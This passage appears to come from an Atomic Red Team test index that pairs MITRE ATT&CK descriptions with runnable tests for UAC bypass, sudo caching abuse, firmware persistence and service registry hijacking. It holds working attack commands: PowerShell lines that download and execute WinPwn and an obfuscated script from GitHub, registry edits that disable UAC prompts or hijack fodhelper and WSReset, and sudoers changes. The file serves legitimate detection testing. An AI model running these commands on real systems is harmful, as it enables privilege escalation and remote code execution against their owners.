Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force
executor:
command: '"#{uacme_exe}"
'
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
name: command_prompt
- name: WinPwn - UAC Magic
auto_generated_guid: 964d8bf8-37bc-4fd3-ba36-ad13761ebbcc
description: UAC bypass using Magic technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic
name: powershell
- name: WinPwn - UAC Bypass ccmstp technique
auto_generated_guid: f3c145f9-3c8d-422c-bd99-296a17a8f567
description: UAC bypass using ccmstp technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp
name: powershell
- name: WinPwn - UAC Bypass DiskCleanup technique
auto_generated_guid: 1ed67900-66cd-4b09-b546-2a0ef4431a0c
description: UAC bypass using DiskCleanup technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup
name: powershell
- name: WinPwn - UAC Bypass DccwBypassUAC technique
auto_generated_guid: 2b61977b-ae2d-4ae4-89cb-5c36c89586be
description: UAC Bypass DccwBypassUAC technique via function of WinPwn
supported_platforms:
- windows
executor:
command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1')
name: powershell
- name: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry
key
auto_generated_guid: 251c5936-569f-42f4-9ac2-87a173b9e9b8
description: "Disable User Account Conrol (UAC) for admin by setting the registry
key \nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin
to 0.\n\n[MedusaLocker Ransomware](https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/),
\n[Purple Fox Rootkit](https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit),
\n[Avaddon Ransomware](https://blogs.blackberry.com/en/2021/06/threat-thursday-avaddon-ransomware-uses-ddos-attacks-as-triple-threat)\n"
supported_platforms:
- windows
executor:
command: |-
$orgValue =(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin).ConsentPromptBehaviorAdmin
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 -Type Dword -Force
cleanup_command: 'Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
-Name ConsentPromptBehaviorAdmin -Value $orgValue -Type Dword -Force
'
name: powershell
elevation_required: true
- name: UAC Bypass with WSReset Registry Modification
auto_generated_guid: 3b96673f-9c92-40f1-8a3e-ca060846f8d9
description: "The following UAC bypass is focused on a registry key under \"HKCU:\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\"
that will trigger a command once wsreset.exe runs. \nThis bypass is limited
to Windows 10 1803/1809 and may not run on Server platforms. The registry
mod is where interest will be.\nIf successful, the command to run will spawn
off wsreset.exe. \n[UAC Bypass in Windows 10 Store Binary](https://0x1.gitlab.io/exploit/UAC-Bypass-in-Windows-10-Store-Binary/)\n"
supported_platforms:
- windows
input_arguments:
commandpath:
description: Registry path
type: string
default: HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command
commandtorun:
description: Command to run
type: string
default: C:\Windows\System32\cmd.exe /c start cmd.exe
executor:
command: |-
New-Item #{commandpath} -Force | Out-Null
New-ItemProperty -Path #{commandpath} -Name "DelegateExecute" -Value "" -Force | Out-Null
Set-ItemProperty -Path #{commandpath} -Name "(default)" -Value "#{commandtorun}" -Force -ErrorAction SilentlyContinue | Out-Null
$Process = Start-Process -FilePath "C:\Windows\System32\WSReset.exe" -WindowStyle Hidden
cleanup_command: 'Remove-Item #{commandpath} -Recurse -Force
'
name: powershell
- name: Disable UAC - Switch to the secure desktop when prompting for elevation
via registry key
auto_generated_guid: 85f3a526-4cfa-4fe7-98c1-dea99be025c7
description: "User Account Control (UAC) is a security mechanism for limiting
the elevation of privileges, including administrative accounts, unless authorized.
\nThis setting ensures that the elevation prompt is only used in secure desktop
mode.\nDisable User Account Conrol (UAC) for secure desktop by setting the
registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop
to 0.\n"
supported_platforms:
- windows
executor:
command: Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
-Name PromptOnSecureDesktop -Value 0 -Type Dword -Force
cleanup_command: 'Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
-Name PromptOnSecureDesktop -Value 1 -Type Dword -Force
'
name: powershell
elevation_required: true
- name: Disable UAC notification via registry keys
auto_generated_guid: 160a7c77-b00e-4111-9e45-7c2a44eda3fd
description: 'This atomic regarding UACDisableNotify pertains to the notification
behavior of UAC. UAC is a critical security feature in Windows that prevents
unauthorized changes to the operating system. It prompts the user for permission
or an administrator password before allowing actions that could affect the
system''s operation or change settings that affect other users. The BlotchyQuasar
RAT defense evasion activities that the adversary to disable UAC notifications
makes it easier for malware and malicious software to execute with elevated
privileges. [Article](https://securityintelligence.com/x-force/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan/)
'
supported_platforms:
- windows
executor:
command: 'reg add "HKLM\SOFTWARE\Microsoft\Security Center" /v UACDisableNotify
/t REG_DWORD /d 1 /f
'
cleanup_command: 'reg add "HKLM\SOFTWARE\Microsoft\Security Center" /v UACDisableNotify
/t REG_DWORD /d 0 /f
'
name: command_prompt
- name: Disable ConsentPromptBehaviorAdmin via registry keys
auto_generated_guid: a768aaa2-2442-475c-8990-69cf33af0f4e
description: 'This atomic regarding setting ConsentPromptBehaviorAdmin to 0
configures the UAC so that it does not prompt for consent or credentials when
actions requiring elevated privileges are performed by users in the administrators
group. This means that any operation that would normally trigger a UAC prompt
will proceed automatically without user interaction.
'
supported_platforms:
- windows
executor:
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
/v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
'
cleanup_command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
/v ConsentPromptBehaviorAdmin /t REG_DWORD /d 5 /f
'
name: command_prompt
- name: UAC bypassed by Utilizing ProgIDs registry.
auto_generated_guid: b6f4645c-34ea-4c7c-98f2-d5a2747efb08
description: 'This atomic designed to simulate the UAC bypassed made by ValleyRAT
by adding customized ProgIDs registry entry.
'
supported_platforms:
- windows
executor:
command: |
reg add "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /d "C:\Windows\System32\calc.exe" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /d ".pwn" /f
echo Triggering fodhelper.exe for potential privilege escalation...
start fodhelper.exe
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /f
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /f
name: command_prompt
T1548.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0
created: '2020-01-30T14:34:44.992Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1548/003
external_id: T1548.003
- source_name: sudo man page 2018
description: Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.
url: https://www.sudo.ws/
- source_name: OSX.Dok Malware
description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web
traffic. Retrieved July 10, 2017.
url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/
- source_name: cybereason osx proton
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
url: https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:26.105Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).
The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though.
Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.
In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \'Defaults !tty_tickets\' >> /etc/sudoers.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
x_mitre_version: '1.1'
identifier: T1548.003
atomic_tests:
- name: Sudo usage
auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e
description: 'Common Sudo enumeration methods.
'
supported_platforms:
- macos
- linux
executor:
name: sh
elevation_required: true
command: "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n"
- name: Sudo usage (freebsd)
auto_generated_guid: 2bf9a018-4664-438a-b435-cc6f8c6f71b1
description: 'Common Sudo enumeration methods.
'
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if sudo is installed.
'
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
executor:
name: sh
elevation_required: true
command: "sudo -l \nsudo cat /usr/local/etc/sudoers\nsudo ee /usr/local/etc/sudoers\n"
- name: Unlimited sudo cache timeout
auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc
description: 'Sets sudo caching timestamp_timeout to a value for unlimited.
This is dangerous to modify without using ''visudo'', do not do this on a
production system.
'
supported_platforms:
- macos
- linux
executor:
name: sh
elevation_required: true
command: |
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
sudo visudo -c -f /etc/sudoers
- name: Unlimited sudo cache timeout (freebsd)
auto_generated_guid: a83ad6e8-6f24-4d7f-8f44-75f8ab742991
description: 'Sets sudo caching timestamp_timeout to a value for unlimited.
This is dangerous to modify without using ''visudo'', do not do this on a
production system.
'
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if sudo is installed.
'
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
executor:
name: sh
elevation_required: true
command: |
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers
sudo visudo -c -f /usr/local/etc/sudoers
- name: Disable tty_tickets for sudo caching
auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
to modify without using ''visudo'', do not do this on a production system.
'
supported_platforms:
- macos
- linux
executor:
name: sh
elevation_required: true
command: |
sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
sudo visudo -c -f /etc/sudoers
- name: Disable tty_tickets for sudo caching (freebsd)
auto_generated_guid: 4df6a0fe-2bdd-4be8-8618-a6a19654a57a
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
to modify without using ''visudo'', do not do this on a production system.
'
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if sudo is installed.
'
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
executor:
name: sh
elevation_required: true
command: |
sudo sh -c "echo Defaults "'!'"tty_tickets >> /usr/local/etc/sudoers"
sudo visudo -c -f /usr/local/etc/sudoers
T1578:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--144e007b-e638-431d-a894-45d90c54ab90
created: '2019-08-30T18:03:05.864Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1578
external_id: T1578
- source_name: Mandiant M-Trends 2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved November
17, 2024.
url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:26.284Z'
name: Modify Cloud Compute Infrastructure
description: |-
An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
x_mitre_version: '1.2'
atomic_tests: []
T1542.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada
created: '2019-12-19T19:43:34.507Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1542/001
external_id: T1542.001
- source_name: McAfee CHIPSEC Blog
description: Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against
Vault 7 Disclosure Scanning. Retrieved March 13, 2017.
url: https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/
- source_name: MITRE Copernicus
description: 'Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions
about BIOS Security. Retrieved December 11, 2015.'
url: http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about
- source_name: Intel HackingTeam UEFI Rootkit
description: Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details.
Retrieved November 17, 2024.
url: https://web.archive.org/web/20170313124421/http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html
- source_name: Github CHIPSEC
description: Intel. (2017, March 18). CHIPSEC Platform Security Assessment
Framework. Retrieved March 20, 2017.
url: https://github.com/chipsec/chipsec
- source_name: About UEFI
description: UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016.
url: http://www.uefi.org/about
- source_name: MITRE Trustworthy Firmware Measurement
description: Upham, K. (2014, March). Going Deep into the BIOS with MITRE
Firmware Security Research. Retrieved January 5, 2016.
url: http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research
- source_name: Wikipedia UEFI
description: Wikipedia. (2017, July 10). Unified Extensible Firmware Interface.
Retrieved July 11, 2017.
url: https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface
- source_name: Wikipedia BIOS
description: Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016.
url: https://en.wikipedia.org/wiki/BIOS
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:26.714Z'
name: 'Pre-OS Boot: System Firmware'
description: |-
Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.(Citation: Wikipedia BIOS)(Citation: Wikipedia UEFI)(Citation: About UEFI)
System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jean-Ian Boutin, ESET
- McAfee
- Ryan Becwar
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Network Devices
x_mitre_version: '1.2'
identifier: T1542.001
atomic_tests:
- name: UEFI Persistence via Wpbbin.exe File Creation
auto_generated_guid: b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1
description: |
Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms.
- https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c
- http://download.microsoft.com/download/8/a/2/8a2fb72d-9b96-4e2d-a559-4a27cf905a80/windows-platform-binary-table.docx
- https://github.com/tandasat/WPBT-Builder
supported_platforms:
- windows
executor:
name: powershell
command: "echo \"Creating %systemroot%\\wpbbin.exe\" \nNew-Item -ItemType
File -Path \"$env:SystemRoot\\System32\\wpbbin.exe\"\n"
cleanup_command: "echo \"Removing %systemroot%\\wpbbin.exe\" \nRemove-Item
-Path \"$env:SystemRoot\\System32\\wpbbin.exe\"\n"
elevation_required: true
T1574.011:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c
created: '2020-03-13T11:42:14.444Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/011
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
September 12, 2024."
url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
url: https://itm4n.github.io/windows-registry-rpceptmapper-eop/
- source_name: hexacorn
description: hexacorn. (2015, January 13). Beyond good ol’ Run key, Part 24.
Retrieved September 25, 2025.
url: https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/
- source_name: Kansa Service related collectors
description: 'Hull, D.. (2014, May 3). Kansa: Service related collectors and
analysis. Retrieved October 10, 2019.'
url: https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html
- source_name: malware_hides_service
description: Lawrence Abrams. (2004, September 10). How Malware hides and
is installed as a Service. Retrieved August 30, 2021.
url: https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/
- source_name: Autoruns for Windows
description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96.
Retrieved March 13, 2020.
url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
- source_name: MDSec
description: MDSec. (n.d.). Autodial(DLL)ing Your Way. Retrieved September
25, 2025.
url: https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/
- source_name: Registry Key Security
description: Microsoft. (2018, May 31). Registry Key Security and Access Rights.
Retrieved March 16, 2017.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN
- source_name: microsoft_services_registry_tree
description: Microsoft. (2021, August 5). HKLM\SYSTEM\CurrentControlSet\Services
Registry Tree. Retrieved August 25, 2021.
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
- source_name: gendigital
description: 'Threat Research Team. (2022, March 22). Operation Dragon Castling:
APT group targeting betting companies. Retrieved September 25, 2025.'
url: https://www.gendigital.com/blog/insights/research/operation-dragon-castling-apt-group-targeting-betting-companies
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:27.075Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Flaws in the permissions for Registry keys related to services can allow adversaries to redirect the originally specified executable to one they control, launching their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).
Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)
The Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)
Adversaries may also add the Parameters key, which can reference malicious drivers file paths. This technique has been identified to be a method of abuse by configuring DLL file paths within the Parameters key of a given services registry configuration. By placing and configuring the Parameters key to reference a malicious DLL, adversaries can ensure that their code is loaded persistently whenever the associated service or library is invoked.
For example, the registry path(Citation: MDSec) HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters(Citation: hexacorn)(Citation: gendigital) contains the AutodiaDLL value, which specifies the DLL to be loaded for autodial funcitionality. An adversary could set the AutodiaDLL to point to a hijacked or malicious DLL:
"AutodialDLL"="c:\temp\foo.dll"
This ensures persistence, as it causes the DLL (in this case, foo.dll) to be loaded each time the Winsock 2 library is invoked.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
- Joe Gumke, U.S. Bank
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.3'
identifier: T1574.011
atomic_tests:
- name: Service Registry Permissions Weakness
auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a
description: |
Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "C:\temp\AtomicRedteam.exe"
supported_platforms:
- windows
input_arguments:
weak_service_name:
description: weak service check
type: string
default: weakservicename
executor:
command: |
get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL
get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL
name: powershell
- name: Service ImagePath Change with reg.exe
auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827
description: 'Change Service registry ImagePath of a bengin service to a malicious
file
'
supported_platforms:
- windows
input_arguments:
weak_service_name:
description: weak service name
type: string
default: calcservice
weak_service_path:
description: weak service path
type: string
default: "%windir%\\system32\\win32calc.exe"
malicious_service_path:
description: malicious service path
type: string
default: "%windir%\\system32\\cmd.exe"
dependency_executor_name: powershell
dependencies:
- description: 'The service must exist (#{weak_service_name})
'
prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit
1}
'
get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
'
executor:
command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}"
/f /v ImagePath /d "#{malicious_service_path}"
'
cleanup_command: 'sc.exe delete #{weak_service_name}
'
name: command_prompt
T1542.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba
created: '2019-12-19T21:05:38.123Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1542/003
external_id: T1542.003
- source_name: Lau 2011
description: Lau, H. (2011, August 8). Are MBR Infections Back in Fashion?
(Infographic). Retrieved November 13, 2014.
url: http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion
- source_name: Mandiant M Trends 2016
description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved
November 17, 2024.
url: https://web.archive.org/web/20211024160454/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf
- source_name: welivesecurity
description: 'Martin Smolár. (2023, March 1). BlackLotus UEFI bootkit: Myth
confirmed. Retrieved February 11, 2025.'
url: https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/
- source_name: Microsoft Security
description: 'Microsoft Incident Response. (2023, April 11). Guidance for
investigating attacks using CVE-2022-21894: The BlackLotus campaign. Retrieved
February 12, 2025.'
url: https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:28.341Z'
name: Bootkit
description: |-
Adversaries may use bootkits to persist on systems. A bootkit is a malware variant that modifies the boot sectors of a hard drive, allowing malicious code to execute before a computer's operating system has loaded. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
In BIOS systems, a bootkit may modify the Master Boot Record (MBR) and/or Volume Boot Record (VBR).(Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code.(Citation: Lau 2011)
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.
In UEFI (Unified Extensible Firmware Interface) systems, a bootkit may instead create or modify files in the EFI system partition (ESP). The ESP is a partition on data storage used by devices containing UEFI that allows the system to boot the OS and other utilities used by the system. An adversary can use the newly created or patched files in the ESP to run malicious kernel code.(Citation: Microsoft Security)(Citation: welivesecurity)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
